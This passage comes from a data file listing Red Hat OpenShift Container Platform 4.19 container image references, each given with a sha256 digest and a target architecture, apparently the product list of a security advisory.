"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
